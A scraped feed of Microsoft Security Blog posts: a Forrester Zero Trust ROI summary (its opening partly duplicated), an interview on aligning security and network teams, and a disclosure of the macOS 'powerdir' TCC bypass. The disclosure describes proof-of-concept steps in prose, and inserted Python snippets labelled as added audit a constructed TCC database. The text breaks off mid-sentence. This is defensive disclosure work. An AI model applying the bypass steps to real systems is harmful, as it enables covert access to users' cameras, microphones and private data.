Enhanced security reduced the risk of a data breach by 50 percent. Improved authentication, network, and endpoint security protocols coupled with increased visibility into the network allowed organizations to better protect themselves from data breaches. And with network segmentation, financial losses were contained in the event of a breach.

“[Implementing strong authentication strategies has] allowed us to provide our employees with a better, more secure environment.”—Principal Architect, Logistics

Reduced cost 

A comprehensive adoption of Zero Trust involves a significant transformation of the entire security strategy—and with it, a restructuring of costs. By eliminating legacy systems and improving processes, organizations uncover significant cost savings opportunities across the entire cybersecurity organization.  

With Microsoft Security solutions, customers were able to simplify their security strategy and retire unnecessary legacy software and infrastructure, resulting in cost savings of over USD7 million. Eliminating redundant security solutions delivered, on average, savings of USD20 per employee per month.

Calls placed to IT and help desk decreased by half.

Process efficiencies also led to cost savings. Calls placed to IT and help desk analysts decreased by 50 percent over a three-year period. The mean time to resolve (MTTR) per inquiry also decreased by 15 percent, leading to a total net present value (NPV) of USD1,773,095 over the three years. In addition, advanced audit and discovery capabilities in the Microsoft solution stack reduced the resources required for audit and compliance management by 25 percent, saving USD2 million NPV.

Greater business agility  


Microsoft Zero Trust solutions deliver 92 percent return on investment, says new Forrester study

January 12th, 2022

In the last two years, we’ve seen a staggering increase in the adoption of cloud-based services, remote work solutions, bring your own device (BYOD), and IoT devices as organizations digitally transform themselves to enable a hybrid workforce.1 Zero Trust has become the essential security strategy for successfully preventing data breaches and mitigating risk in today’s complex cybersecurity landscape.

Implementing a Zero Trust security strategy, however, is a significant undertaking that requires in-depth planning, cross-company collaboration, and resources. Organizations need solutions that simplify and accelerate the adoption of Zero Trust by offering flexibility, integration, and a meaningful return on investment.

In the commissioned study The Total Economic Impact™ of Zero Trust solutions from Microsoft, Forrester Consulting reports that adoption of Microsoft solutions to implement a Zero Trust security strategy delivers:

  • A three-year 92 percent return on investment (ROI) with a payback period of fewer than six months.
  • A 50 percent lower chance of a data breach.
  • Numerous efficiency gains of 50 percent or higher across security processes.

Figure: Total Economic Impact of implementing Zero Trust with Microsoft shows 92 percent ROI and $11.6 million NPV.

To better understand the benefits, costs, and risks associated with this investment, Forrester Consulting interviewed eight decision-makers with experience using Microsoft Security solutions to implement a Zero Trust security strategy. These customers were able to improve their security posture, reduce costs, achieve greater business agility, and increase efficiency in managing security. 

Improved security posture 

Data breaches can be incredibly costly as organizations work to recover their environment and brand reputation. Forrester found that by adopting Microsoft security solutions for their Zero Trust strategy, organizations were able to reduce not only the risk of a breach but also the potential for regulatory violations. Customers also reported significant improvements in their security postures since beginning their journeys, a reduction of shadow IT, and increased compliance by meeting various regulatory requirements. 

Data breach risk reduced by half.

Enhanced security reduced the risk of a data breach by 50 percent. Improved authentication, network, and endpoint security protocols coupled with increased visibility into the network allowed organizations to better protect themselves from data breaches. And with network segmentation, financial losses were contained in the event of a breach.

“[Implementing strong authentication strategies has] allowed us to provide our employees with a better, more secure environment.”—Principal Architect, Logistics

Reduced cost 

A comprehensive adoption of Zero Trust involves a significant transformation of the entire security strategy—and with it, a restructuring of costs. By eliminating legacy systems and improving processes, organizations uncover significant cost savings opportunities across the entire cybersecurity organization.  

With Microsoft Security solutions, customers were able to simplify their security strategy and retire unnecessary legacy software and infrastructure, resulting in cost savings of over USD7 million. Eliminating redundant security solutions delivered an average savings of $20 per employee per month.

Calls placed to IT and help desk decreased by half.

Process efficiencies also led to cost savings. Calls placed to IT and help desk analysts decreased by 50 percent over a three-year period. The mean time to resolve (MTTR) per inquiry also decreased by 15 percent, leading to a total net present value (NPV) of USD1,773,095 over the three years. In addition, advanced audit and discovery capabilities in the Microsoft solution stack reduced the resources required for audit and compliance management by 25 percent, saving USD2 million NPV.

Greater business agility  

A simplified security architecture through Zero Trust improves business agility. Through efficient system management and user access, organizations can move quickly to pursue business opportunities, and support remote work while managing risk.

80 percent less effort required to secure new infrastructure.

Microsoft Security solutions reduced the effort required to provision and secure new infrastructure by 80 percent through automated provisioning of new systems, from SQL servers to virtual machines for new applications. The time required to provision new infrastructure went from several months to days. Meanwhile, workers improved their productivity through better access. Frontline workers gained efficient access to business-critical applications and systems of record, saving them an average of 30 minutes per week.  

With many of the Microsoft solutions that support Zero Trust available on a software as a service (SaaS) basis, organizations can quickly expand or contract their environment without needing to purchase additional hardware or dedicate resources to implement changes. 

“[Using Microsoft security solutions] has allowed us to focus more on our future as opposed to worrying about infrastructure.”—Identity Engineer, Manufacturing 

Efficient security management  

Most organizations dedicate too much time to triaging, investigating, and remediating alerts. A simplified Zero Trust security framework can reduce management time, both by cutting down the number of security incidents and by improving security response. 

Reduced management time by half due to improved security processes.

Customers that had implemented Microsoft’s Zero Trust security framework reported a 50 percent reduction in management time due to improved security processes. Security teams were able to provision and secure new infrastructure 80 percent more quickly and accelerate the process to set up users on new devices. They were able to more quickly remediate security issues using built-in automation in Microsoft solutions such as Microsoft Sentinel, Microsoft Azure Active Directory (Azure AD), and Microsoft 365 Defender.

“Azure AD has definitely allowed us to become more agile. We can make changes on a dime. Whereas, with our legacy system, product changes were far more cumbersome and painful. With our previous identity and access management (IAM) solution, we often had to write custom code and update our IAM solution across multiple data centers [and] then troubleshoot any problems. With Azure AD, everything is handled by Microsoft. This has allowed us to free up some of our resources and dedicate them to migrating our remaining applications to Azure AD.”—Principal Architect of Technical Services, Logistics Firm

Embrace proactive security with the Microsoft Zero Trust framework 

Zero Trust is the essential security strategy in today’s hybrid work environment. A complicated IT landscape of remote and group office users introduces more digital attack surfaces and risk, as perimeters are increasingly fluid. With security products and services that verify explicitly, grant least privileged access, and assume breaches, the Microsoft Zero Trust framework supports a proactive, integrated approach to security across all layers of the digital estate. We look forward to continuing to serve and protect our customers with a comprehensive Zero Trust strategy and solutions.

Learn more

  • Read our Zero Trust position paper for key insights, an example of a comprehensive security architecture, and a maturity model to help accelerate your adoption. 

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.


1 New insights on cybersecurity in the age of hybrid work, Bret Arsenault, Microsoft Security, Microsoft. 27 October 2021.

The post Microsoft Zero Trust solutions deliver 92 percent return on investment, says new Forrester study appeared first on Microsoft Security Blog.


Coming Soon: New Security Update Guide Notification System

January 11th, 2022

Sharing information through the Security Update Guide is an important part of our ongoing effort to help customers manage security risks and keep systems protected. Based on your feedback we have been working to make signing up for and receiving Security Update Guide notifications easier. We are excited to share that starting today, you can …


Align your security and network teams to Zero Trust security demands

January 10th, 2022

The security community is continuously changing, growing, and learning from each other to better position the world against cyber threats. In the latest Voice of the Community blog series post, Microsoft Security Product Marketing Manager Natalia Godyla talks with Jennifer Minella, Founder and Principal Advisor on Network Security at Viszen Security about strategies for aligning the security operations center (SOC) and network operations center (NOC) to meet the demands of Zero Trust and protect your enterprise.

Natalia: In your experience, why are there challenges bringing together networking and security teams?

Jennifer: Ultimately, it’s about trust. As someone who’s worked on complex network-based security projects, I’ve had plenty of experience sitting between those two teams. Often the security teams have an objective, which gets translated into specific technical mandates, or even a specific product. As in, we need to achieve X, Y, and Z level security; therefore, the networking team should just go make this product work. That causes friction because sometimes the networking team didn’t get a voice in that.

Sometimes it’s not even the right product or technology for what the actual goal was, but it’s too late at that point because the money is spent. Then it’s the networking team that looks bad when they don’t get it working right. It’s much better to bring people together to collaborate, instead of one team picking a solution.

Natalia: How does misalignment between the SOC and NOC impact the business?

Jennifer: When there’s an erosion of trust and greater friction, it makes everything harder. Projects take longer. Decisions take longer. That lack of collaboration can also introduce security gaps. I have several examples, but I’m going to pick healthcare here. Say the Chief Information Security Officer’s (CISO) team believes that their bio-medical devices are secured a certain way from a network perspective, but that’s not how they’re secured. Meaning, they’re secured at a lower level that would not be sufficient based on how the CISO and the compliance teams were tracking it. So, there’s this misalignment, miscommunication. Not that it’s malicious; nobody is doing it on purpose, but requirements aren’t communicated well. Sometimes there’s a lack of clarity about whose responsibility it is, and what those requirements are. Even within larger organizations, it might not be clear what the actual standards and processes are that support that policy from the perspective of governance, risk, and compliance (GRC).

Natalia: So, what are a few effective ways to align the SOC and NOC?

Jennifer: If you can find somebody that can be a third party, somebody that’s going to come in and help the teams collaborate and build trust, it’s invaluable. It can be someone who specializes in organizational health or a technical third party; somebody like me sitting in the middle who says, “I understand what the networking team is saying. I hear you. And I understand what the security requirements are. I get it.” Then you can figure out how to bridge that gap and get both teams collaborating with bi-directional communication, instead of security just mandating that this thing gets done.

It’s also about the culture, the interpersonal relationships involved. It can be a problem if one team is picked (to be in charge) instead of another. Maybe it’s the SOC team versus the NOC team, and the SOC team is put in charge; therefore, the NOC team just gives up. It might be better to go with a neutral internal person instead, like a program manager or a digital-transformation leader, somebody who owns a program or a project but isn’t tied to the specifics of security or network architecture. Building that kind of cross-functional team between departments is a good way to solve problems.

There isn’t a wrong way to do it if everybody is being heard. Emails are not a great way to accomplish communication among teams. But getting people together, outlining what the goal is, and working towards it, that’s preferable to just having discrete decision points and mandates. Here’s the big goal: what are some ideas to get from point A to point B? That’s something we must do moving into Zero Trust strategies.

Natalia: Speaking of Zero Trust, how does Zero Trust figure into an overarching strategy for a business?

Jennifer: I describe Zero Trust as a concept. It’s more of a mindset, like “defense in depth,” “layered defense,” or “concepts of least privilege.” Trying to put it into a fixed model or framework is what’s leading to a lot of the misconceptions around the Zero Trust strategy. For me, getting from point A to point B with organizations means taking baby steps: identifying gaps, use cases, and then finding the right solutions.

A lot of people assume Zero Trust is this granular one-to-one relationship of every element on the network. Meaning, every user, every endpoint, every service, and application data set is going to have a granular “allow or deny” policy. That’s not what we’re doing right now. Zero Trust is just a mindset of removing inherent trust. That could mean different things, for example, it could be remote access for employees on a virtual private network (VPN), or it could be dealing with employees with bring your own device (BYOD). It could mean giving contractors or people with elevated privileges access to certain data sets or applications, or we could apply Zero Trust principles to secure workloads from each other.

Natalia: And how does Secure Access Service Edge (SASE) differ from Zero Trust?

Jennifer: Zero Trust is not a product. SASE, on the other hand, is a suite of products and services put together to help meet Zero Trust architecture objectives. SASE is a service-based product offering that has a feature set. It varies depending on the manufacturer, meaning, some will give you these three features and some will give you another five or eight. Some are based on endpoint technology, some are based on software-defined wide area network (SD-WAN) solutions, while some are cloud routed.

Natalia: How does the Zero Trust approach fit with the network access control (NAC) strategy?

Jennifer: I jokingly refer to Zero Trust as “NAC 4.0.” I’ve worked in the NAC space for over 15 years, and it’s just a few new variables. But they’re significant variables. Working with cloud-hosted resources in cloud-routed data paths is fundamentally different than what we’ve been doing in local area network (LAN) based systems. But if you abstract that (the concepts of privilege, authentication, authorization, and data paths), it’s all the same. I lump the vendors and types of solutions into two different categories: cloud-routed versus traditional on-premises (for a campus environment). The technologies are drastically different between those two use cases. For that reason, the enforcement models are different and will vary with the products.

Natalia: How do you approach securing remote access with a Zero Trust mindset? Do you have any guidelines or best practices?

Jennifer: It’s alarming how many organizations set up VPN remote access so that users are added onto the network as if they were sitting in their office. For a long time that was accepted because, before the pandemic, there was a limited number of remote users. Now, remote access, in addition to the cloud, is more prevalent. There are many people with personal devices or some type of blended, corporate-managed device. It’s a recipe for disaster.

The threat surface has increased exponentially, so you need to be able to go back in and use a Zero Trust product in a kind of enclave model, which works a lot like a VPN. You set up access at a point (wherever the VPN is) and the users come into that. That’s a great way to start and you can tweak it from there. Your users access an agent or a platform that will stay with them through that process of tweaking and tuning. It’s impactful because users are switching from a VPN client to a kind of a Zero Trust agent. But they don’t know the difference because, on the back end, the access is going to be restricted. They’re not going to miss anything. And there’s lots of modeling engines and discovery that products do to map out who’s accessing what, and what’s anomalous. So, that’s a good starting point for organizations.

Natalia: How should businesses think about telemetry? How can security and networking teams best use it to continue to keep the network secure?

Jennifer: You need to consider the capabilities of visibility, telemetry, and discovery on endpoints. You’re not just looking at what’s on the endpoint (we’ve been doing that) but what is the endpoint talking to on the internet when it’s not behind the traditional perimeter. Things like secure web gateways, or solutions like a cloud access security broker (CASB), which further extends that from an authentication standpoint, data pathing with SD-WAN routing—all of that plays in.

Natalia: What is a common misconception about Zero Trust?

Jennifer: You don’t have to boil the ocean with this. We know from industry reports, analysts, and the National Institute of Standards and Technology (NIST) that there’s not one product that’s going to meet all the Zero Trust requirements. So, it makes sense to chunk things into discrete programs and projects that have boundaries, then find a solution that works for each. Zero Trust is not about rip and replace.

The first step is overcoming that mental hurdle of feeling like you must pick one product that will do everything. If you can aggregate that a bit and find a product that works for two or three, that’s awesome, but it’s not a requirement. A lot of organizations are trying to research everything ad nauseam before they commit to anything. But this is a volatile industry, and it’s likely that with any product’s features, the implementation is going to change drastically over the next 18 months. So, if you’re spending nine months researching something, you’re not going to get the full benefit in longevity. Just start with something small that’s palatable from a resource and cost standpoint.

Natalia: What types of products work best in helping companies take a Zero Trust approach?

Jennifer: A lot of requirements stem from the organization’s technological culture. Meaning, is it on-premises or a cloud environment? I have a friend that was a CISO at a large hospital system, which required having everything on-premises. He’s now a CISO at an organization that has zero on-premises infrastructure; they’re completely in the cloud. It’s a night-and-day change for security. So, you’ve got that, combined with trying to integrate with what’s in the environment currently. Because typically these systems are not greenfield, they’re brownfield—we’ve got users and a little bit of infrastructure and applications, and it’s a matter of upfitting those things. So, it just depends on the organization. One may have a set of requirements and applications that are newer and based on microservices. Another organization might have more on-premises legacy infrastructure architectures, and those aren’t supported in a lot of cloud-native and cloud-routed platforms.

Natalia: So, what do you see as the future for the SOC and NOC?

Jennifer: I think the message moving forward is—we must come together. And it’s not just networking and security; there are application teams to consider as well. It’s the same with IoT. These are transformative technologies. Whether it’s the combination of operational technology (OT) and IT, or the prevalence of IoT in the environment, or Zero Trust initiatives, all of these demand cross-functional teams for trust building and collaboration. That’s the big message.

Learn more

Get key resources from Microsoft Zero Trust strategy decision makers and deployment teams. To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Align your security and network teams to Zero Trust security demands appeared first on Microsoft Security Blog.

New macOS vulnerability, “powerdir,” could lead to unauthorized user data access

Following our discovery of the “Shrootless” vulnerability, Microsoft uncovered a new macOS vulnerability, “powerdir,” that could allow an attacker to bypass the operating system’s Transparency, Consent, and Control (TCC) technology, thereby gaining unauthorized access to a user’s protected data. We shared our findings with Apple through Coordinated Vulnerability Disclosure (CVD) via Microsoft Security Vulnerability Research (MSVR). Apple released a fix for this vulnerability, now identified as CVE-2021-30970, as part of security updates released on December 13, 2021. We encourage macOS users to apply these security updates as soon as possible.

Introduced by Apple in 2012 on macOS Mountain Lion, TCC is essentially designed to help users configure the privacy settings of their apps, such as access to the device’s camera, microphone, or location, as well as access to the user’s calendar or iCloud account, among others. To protect TCC, Apple introduced a feature that prevents unauthorized code execution and enforced a policy that restricts access to TCC to only apps with full disk access. We discovered that it is possible to programmatically change a target user’s home directory and plant a fake TCC database, which stores the consent history of app requests. If exploited on unpatched systems, this vulnerability could allow a malicious actor to potentially orchestrate an attack based on the user’s protected personal data. For example, the attacker could hijack an app installed on the device—or install their own malicious app—and access the microphone to record private conversations or capture screenshots of sensitive information displayed on the user’s screen.

It should be noted that other TCC vulnerabilities were previously reported and subsequently patched before our discovery. It was also through our examination of one of the latest fixes that we came across this bug. In fact, during this research, we had to update our proof-of-concept (POC) exploit because the initial version no longer worked on the latest macOS version, Monterey. This shows that even as macOS or other operating systems and applications become more hardened with each release, software vendors like Apple, security researchers, and the larger security community, need to continuously work together to identify and fix vulnerabilities before attackers can take advantage of them.

Microsoft security researchers continue to monitor the threat landscape to discover new vulnerabilities and attacker techniques that could affect macOS and other non-Windows devices. The discoveries and insights from our research enrich our protection technologies and solutions, such as Microsoft Defender for Endpoint, which allows organizations to gain visibility to their networks that are increasingly becoming heterogeneous. For example, this research informed the generic detection of behavior associated with this vulnerability, enabling Defender for Endpoint to immediately provide visibility and protection against exploits even before the patch is applied. Such visibility also enables organizations to detect, manage, respond to, and remediate vulnerabilities and cross-platform threats faster.

In this blog post, we will share some information about TCC, discuss previously reported vulnerabilities, and present our own unique findings.

TCC overview

As mentioned earlier, TCC is a technology that prevents apps from accessing users’ personal information without their prior consent and knowledge. The user commonly manages it under System Preferences in macOS (System Preferences > Security & Privacy > Privacy):

Figure 1. The macOS Security & Privacy pane that serves as the front end of TCC.

TCC maintains databases that contain consent history for app requests. Generally, when an app requests access to protected user data, one of two things can happen:

  1. If the app and the type of request have a record in the TCC databases, then a flag in the database entry dictates whether to allow or deny the request automatically, without any user interaction.
  2. If the app and the type of request do not have a record in the TCC databases, then a prompt is presented to the user, who decides whether to grant or deny access. That decision is then recorded in the database so that subsequent similar requests fall under the first scenario.

Under the hood, there are two kinds of TCC databases. Each kind maintains only a subset of the request types:

  • User-specific database: contains stored permission types that only apply to the specific user profile; it is saved under ~/Library/Application Support/com.apple.TCC/TCC.db and can be accessed by the user who owns the said profile
  • System-wide database: contains stored permission types that apply on a system level; it is saved under /Library/Application Support/com.apple.TCC/TCC.db and can be accessed by users with root or full disk access

macOS implements the TCC logic by using a special daemon called tccd. Indeed, there are at least two instances of tccd: one run by the user and the other by root.

Figure 2. Two tccd instances: per-user and system-wide.

Each type of request starts with a kTCCService prefix. While not an exhaustive list, below are some examples:

Request type                          | Description                   | Handled by
--------------------------------------|-------------------------------|---------------------------
kTCCServiceLiverpool                  | Location services access      | User-specific TCC database
kTCCServiceUbiquity                   | iCloud access                 | User-specific TCC database
kTCCServiceSystemPolicyDesktopFolder  | Desktop folder access         | User-specific TCC database
kTCCServiceCalendar                   | Calendar access               | User-specific TCC database
kTCCServiceReminders                  | Access to reminders           | User-specific TCC database
kTCCServiceMicrophone                 | Microphone access             | User-specific TCC database
kTCCServiceCamera                     | Camera access                 | User-specific TCC database
kTCCServiceSystemPolicyAllFiles       | Full disk access capabilities | System-wide TCC database
kTCCServiceScreenCapture              | Screen capture capabilities   | System-wide TCC database
Table 1. Types of TCC requests.

It should also be noted that the TCC.db file is a SQLite database, so if full disk access is granted to a user, they can view the database and even edit it:

Figure 3. Dumping the TCC.db access table, given full disk access.

The database columns are self-explanatory, save for the csreq column. The csreq values contain a hexadecimal blob that encodes the code signing requirements for the app. These values can be calculated easily with the codesign and csreq utilities, as seen in Figure 4 below:

Figure 4. Building the csreq blob manually for an arbitrary app.

Given these, should a malicious actor gain full disk access to the TCC databases, they could edit them to grant arbitrary permissions to any app they choose, including their own malicious app. The affected user would not be prompted to allow or deny those permissions, so the app would run with capabilities the user may never have known about or consented to.
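The two-way lookup described earlier (existing record decides silently, otherwise prompt) and the tampering risk just discussed can both be made concrete with a small audit script. The following is an added example, not code from the Microsoft post: it builds a constructed, simplified stand-in for the access table (the column set and the auth_value encoding are assumptions, as is the placeholder csreq blob), models tccd's decision flow over it, and then shows the two checks a defender would run against a baseline: newly appeared grants for sensitive services, and rows whose csreq is empty, meaning the client is not pinned to a code-signing requirement at all.

```python
"""Audit a TCC.db-style access table and model tccd's allow/deny/prompt flow.

Added example, not code from the Microsoft post. The access table is a
constructed, simplified stand-in (column set and auth_value encoding are
assumptions), so everything runs offline against a throwaway file.
"""
import os
import sqlite3
import tempfile

# Request types from Table 1 whose grants matter most for a user's privacy.
SENSITIVE_SERVICES = {
    "kTCCServiceMicrophone",
    "kTCCServiceCamera",
    "kTCCServiceScreenCapture",
    "kTCCServiceSystemPolicyAllFiles",
}
# Assumed auth_value encoding: 0 = denied, 2 = allowed.
AUTH_DENIED, AUTH_ALLOWED = 0, 2
# Constructed placeholder for a csreq blob; not a real compiled requirement.
FAKE_CSREQ = b"\xfa\xde\x0c\x00constructed"


def build_constructed_db(path: str) -> None:
    """Create the constructed access table with three sample consent records."""
    conn = sqlite3.connect(path)
    conn.execute(
        "CREATE TABLE access (service TEXT NOT NULL, client TEXT NOT NULL,"
        " client_type INTEGER NOT NULL, auth_value INTEGER NOT NULL, csreq BLOB,"
        " PRIMARY KEY (service, client, client_type))"
    )
    conn.executemany("INSERT INTO access VALUES (?, ?, 0, ?, ?)", [
        ("kTCCServiceMicrophone", "com.example.conferencing", AUTH_ALLOWED, FAKE_CSREQ),
        ("kTCCServiceCamera", "com.example.conferencing", AUTH_DENIED, FAKE_CSREQ),
        ("kTCCServiceCalendar", "com.example.notes", AUTH_ALLOWED, FAKE_CSREQ),
    ])
    conn.commit()
    conn.close()


def decide(path: str, service: str, client: str) -> str:
    """The two-way flow: an existing record decides silently, otherwise prompt."""
    conn = sqlite3.connect(path)
    row = conn.execute(
        "SELECT auth_value FROM access WHERE service = ? AND client = ?",
        (service, client),
    ).fetchone()
    conn.close()
    if row is None:
        return "prompt"
    return "allow" if row[0] == AUTH_ALLOWED else "deny"


def snapshot_grants(path: str) -> set:
    """All (service, client) pairs currently allowed; keep one as a baseline."""
    conn = sqlite3.connect(path)
    rows = conn.execute(
        "SELECT service, client FROM access WHERE auth_value = ?", (AUTH_ALLOWED,)
    ).fetchall()
    conn.close()
    return set(rows)


def new_sensitive_grants(baseline: set, current: set) -> set:
    """Sensitive-service grants that appeared since the baseline was taken."""
    return {g for g in current - baseline if g[0] in SENSITIVE_SERVICES}


def rows_missing_csreq(path: str) -> list:
    """Rows without a code-signing requirement: any binary can claim that client."""
    conn = sqlite3.connect(path)
    rows = conn.execute(
        "SELECT service, client FROM access WHERE csreq IS NULL OR length(csreq) = 0"
    ).fetchall()
    conn.close()
    return rows


def demo() -> dict:
    """Run the decision flow and the audit against the constructed database."""
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "TCC.db")
        build_constructed_db(path)
        baseline = snapshot_grants(path)
        decisions = {
            "mic": decide(path, "kTCCServiceMicrophone", "com.example.conferencing"),
            "cam": decide(path, "kTCCServiceCamera", "com.example.conferencing"),
            "new": decide(path, "kTCCServiceReminders", "com.example.notes"),
        }
        # Constructed out-of-band edit of the kind a full-disk-access process
        # could make: a grant for an unknown client written with no csreq.
        conn = sqlite3.connect(path)
        conn.execute("INSERT INTO access VALUES (?, ?, 0, ?, NULL)",
                     ("kTCCServiceScreenCapture", "com.example.unknown", AUTH_ALLOWED))
        conn.commit()
        conn.close()
        return {
            "decisions": decisions,
            "new_grants": new_sensitive_grants(baseline, snapshot_grants(path)),
            "unpinned": rows_missing_csreq(path),
        }
```

On a real system the baseline would be taken from a copy of TCC.db made by a process that legitimately holds full disk access, and the diff re-run on a schedule; a grant that appears without a matching user prompt in the same window, or without a csreq, is the signal worth investigating.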

Securing (and bypassing) TCC: Techniques and previously reported vulnerabilities

Previously, apps could access the TCC databases directly to view and even modify their contents. Given the risk of bypass mentioned earlier, Apple made two changes. First, Apple protected the system-wide TCC.db via System Integrity Protection (SIP), a macOS feature that prevents unauthorized code execution. Secondly, Apple enforced a TCC policy that only apps with full disk access can access the TCC.db files. Note, though, that this policy was also subsequently abused, as some apps require such access to function properly (for example, the SSH daemon, sshd).

Interestingly, attackers can still find out whether a user’s Terminal has full disk access by simply trying to list the files under /Library/Application Support/com.apple.TCC. A successful attempt means that the Terminal has full disk access capabilities, and an attacker can, therefore, freely modify the user’s TCC.db.

In addition, there have been several previously reported vulnerabilities related to TCC bypass. These include the following:

  • Time Machine mounts (CVE-2020-9771): macOS offers a built-in backup and restore solution called Time Machine. It was discovered that Time Machine backups could be mounted (using the apfs_mount utility) with the “noowners” flag. Since these backups contain the TCC.db files, an attacker could mount those backups and determine the device’s TCC policy without having full disk access.
  • Environment variable poisoning (CVE-2020-9934): It was discovered that the user’s tccd could build the path to the TCC.db file by expanding $HOME/Library/Application Support/com.apple.TCC/TCC.db. Since the user could manipulate the $HOME environment variable (as introduced to tccd by launchd), an attacker could plant a chosen TCC.db file in an arbitrary path, poison the $HOME environment variable, and make TCC.db consume that file instead.
  • Bundle conclusion issue (CVE-2021-30713): First disclosed by Jamf in a blog post about the XCSSET malware family, this bug abused how macOS was deducing app bundle information. For example, suppose an attacker knows of a specific app that commonly has microphone access. In that case, they could plant their application code in the target app’s bundle and “inherit” its TCC capabilities.

Apple has since patched these vulnerabilities. However, based on our research, TCC.db can still be bypassed. The following section discusses the vulnerability we discovered and some details about the POC exploits we developed to prove it.

Modifying the home directory: The ‘powerdir’ vulnerability

In assessing the previous TCC vulnerabilities, we evaluated how Apple fixed each issue. One fix that caught our attention was for CVE-2020-9934 (the $HOME environment variable poisoning vulnerability). The fix can be seen in the _db_open function in tccd:

Figure 5. The tccd fix for CVE-2020-9934 (screenshot of the _db_open function).

We noted that instead of expanding the $HOME environment variable, Apple decided to invoke getpwuid() on the current user (retrieved with getuid()). The getpwuid function returns a pointer to a structure in memory (struct passwd *) that contains information about the given user, and tccd extracts its pw_dir member. This member holds the user’s home directory, and its value persists even after the $HOME environment variable is modified.

While the solution indeed prevents an attack by environment variable poisoning, it does not protect against the core issue. Thus, we set out to investigate: can an app programmatically change the user’s home directory and plant a fake TCC.db file?
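
To make the fix concrete, here is an added Python illustration (not tccd’s code, and not from the original post) of the two ways a daemon can resolve the home directory. The environment-based lookup moves wherever $HOME points; the getpwuid-based lookup does not, but it returns whatever the account record says, which is exactly the value the home-directory change described in the next sections targets. The path layout mirrors the one given above; the constructed HOME value is an assumption.

```python
"""Two ways a daemon can resolve a user's home directory.

Added illustration of the CVE-2020-9934 fix; this is not tccd's code.
The path suffix mirrors the layout the text describes. Runs on any Unix.
"""
import os
import pwd

TCC_SUFFIX = "Library/Application Support/com.apple.TCC/TCC.db"


def tcc_path_from_env(environ=None):
    """Pre-fix behaviour: trust $HOME exactly as the parent process handed it down.

    Whoever controls the environment controls where the database is read from,
    which is the CVE-2020-9934 problem.
    """
    env = os.environ if environ is None else environ
    home = env.get("HOME")
    if home is None:
        return None
    return os.path.join(home, TCC_SUFFIX)


def tcc_path_from_passwd(uid=None):
    """Post-fix behaviour: ask the account database (getpwuid) for pw_dir.

    The value ignores $HOME entirely; it is whatever the user record holds,
    so changing that record itself still redirects the lookup.
    """
    if uid is None:
        uid = os.getuid()
    try:
        entry = pwd.getpwuid(uid)
    except KeyError:  # no account record for this uid (e.g. minimal containers)
        return None
    return os.path.join(entry.pw_dir, TCC_SUFFIX)


def env_poisoning_changes_lookup(fake_home="/tmp/constructed-home"):
    """Poison a *copy* of the environment with a constructed HOME and return
    (env_based_path, passwd_based_path). Only the env-based path moves."""
    poisoned = dict(os.environ, HOME=fake_home)
    return tcc_path_from_env(poisoned), tcc_path_from_passwd()


if __name__ == "__main__":
    env_path, pw_path = env_poisoning_changes_lookup()
    print("from $HOME   :", env_path)
    print("from getpwuid:", pw_path)
```

Running it shows the env-derived path under the constructed home while the passwd-derived path stays under the real account home (or is None where the uid has no passwd entry).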

The first POC exploit

Our first attempt to answer the above question was simple: plant a fake TCC.db file and change the home directory using the Directory Services command-line utility (dscl):

Although this requires root access, we discovered that it works only if the app has been granted the TCC policy kTCCServiceSystemPolicySysAdminFiles, which the local or user-specific TCC.db maintains. That is a weaker requirement than full disk access, but we managed to bypass even that restriction with the dsexport and dsimport utilities.

Next, simply by exporting the Directory Services entry of a user, manipulating the output file, and importing the file again, we managed to bypass the dscl TCC policy restriction.

Our first POC exploit, therefore, does the following:

  1. Get a csreq blob for the target app.
  2. Plant a fake TCC.db file with required access and the csreq blob.
  3. Export the user’s Directory Services entry with dsexport.
  4. Modify the Directory Services entry to change the user’s home directory.
  5. Import the modified Directory Services entry with dsimport.
  6. Stop the user’s tccd and reboot the process.

Using this exploit, an attacker could change settings on any application. In the screenshot below, we show how the exploit could allow attackers to enable microphone and camera access on any app, for example, Teams.

Figure 6. Our first working POC exploit, running without a popup notification from TCC (screenshot).

We reported our initial findings to the Apple product security team on July 15, 2021, before becoming aware of a similar bypass presented by Wojciech Reguła and Csaba Fitzl at BlackHat USA 2021 in August. However, our exploit still worked even after Apple fixed the said similar finding (now assigned as CVE-2020-27937). Therefore, we still considered our research to be a new vulnerability.

Monterey release and the second POC exploit

We shared our findings with Apple through Coordinated Vulnerability Disclosure (CVD) via Microsoft Security Vulnerability Research (MSVR) before the release of macOS Monterey in October. However, upon the release of that version, we noticed that our initial POC exploit no longer worked because of changes in how the dsimport tool works. Thus, we looked for another way of changing the home directory silently.

While examining macOS Monterey, we came across /usr/libexec/configd, an Apple binary shipped with that release: the System Configuration daemon, responsible for many configuration aspects of the local system. There are three aspects of configd that we took note of and made use of:

  1. It is an Apple-signed binary entitled with “com.apple.private.tcc.allow” with the value kTCCServiceSystemPolicySysAdminFiles. This means it can change the home directory silently.
  2. It has extensibility in configuration agents, which are macOS Bundles under the hood. This hints that it might load a custom Bundle, meaning we could inject code for our purposes.
  3. It does not have the hardened runtime flag, which allows it to load custom configuration agents. While this is most likely by design, it also means we could load completely unsigned code into it.

By running configd with the -t option, an attacker could specify a custom Bundle to load. Our new POC exploit therefore replaces the dsexport and dsimport method of changing the user’s home directory with code injection into configd. The outcome is the same as with our first POC exploit: settings can be modified to grant any app, Teams for example, access to the camera and other protected services.

As before, we shared our latest findings with Apple. Again, we want to thank their product security team for their cooperation.

Detecting the powerdir vulnerability with Microsoft Defender for Endpoint

Our research on the powerdir vulnerability is yet another example of the tight race between software vendors and malicious actors: that despite the continued efforts of the former to secure their applications through regular updates, other vulnerabilities will inevitably be uncovered, which the latter could exploit for their own gain. And as system vulnerabilities are possible entry points for attackers to infiltrate an organization’s network, comprehensive protection is needed to allow security teams to manage vulnerabilities and threats across all platforms.

Microsoft Defender for Endpoint is an industry-leading, cloud-powered endpoint security solution that lets organizations manage their heterogeneous computing environments through a unified security console. Its threat and vulnerability management capabilities empower defenders to quickly discover, prioritize, and remediate misconfigurations and vulnerabilities, such as the powerdir vulnerability. In addition, Defender for Endpoint’s unparalleled threat optics are built on the industry’s deepest threat intelligence and backed by world-class security experts who continuously monitor the threat landscape.

One of the key strengths of Defender for Endpoint is its ability to generically detect and recognize malicious behavior. For example, as seen in the previous section, our POC exploits conduct many suspicious activities, including:

